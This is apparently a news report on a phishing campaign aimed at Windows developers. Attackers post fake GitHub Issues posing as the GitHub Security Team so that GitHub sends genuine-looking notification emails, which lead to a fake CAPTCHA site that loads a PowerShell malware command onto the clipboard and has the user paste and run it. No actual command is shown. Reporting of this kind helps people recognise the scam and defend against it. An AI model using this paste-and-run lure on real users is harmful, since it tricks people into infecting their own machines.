Malicious distributors in have developed a new method to send deceptive emails posing as the Security team at GitHub. These emails target developers using the Windows platform, urging them to take actions that ultimately lead to the installation of malware on their systems. The concerning aspect of this tactic is that the emails appear to be sent from legitimate GitHub servers, making them look like authentic notifications if not carefully examined.
The attackers initiate the distribution of these emails by posting a message on the “Issues” section of GitHub, pretending to identify a security problem. However, instead of detailing any vulnerabilities, they insert text stylized to appear as if it’s coming from the GitHub Security Team. Developers associated with the project receive an email notification about a new message in the Issues section, giving the impression that it’s a communication directly from GitHub. To avoid raising suspicion on the GitHub page, the fabricated Issue is promptly removed.
The email instructs recipients to find more information about the alleged problem on a fake website called Github-scanner.com, created by the attackers. The site utilizes a cunning and deceptive method to trick users into unwittingly downloading and executing malicious software. Upon visiting the site, users encounter a confirmation request, seemingly to verify the user as a human rather than a bot. The request prompts users to agree to a check, followed by pressing specific key combinations like “Windows+R”, “Ctrl+V”, and Enter. By clicking the Consent button, a command to download and run malware through PowerShell is copied, while the key combinations trigger the insertion of a malicious command from the clipboard.
<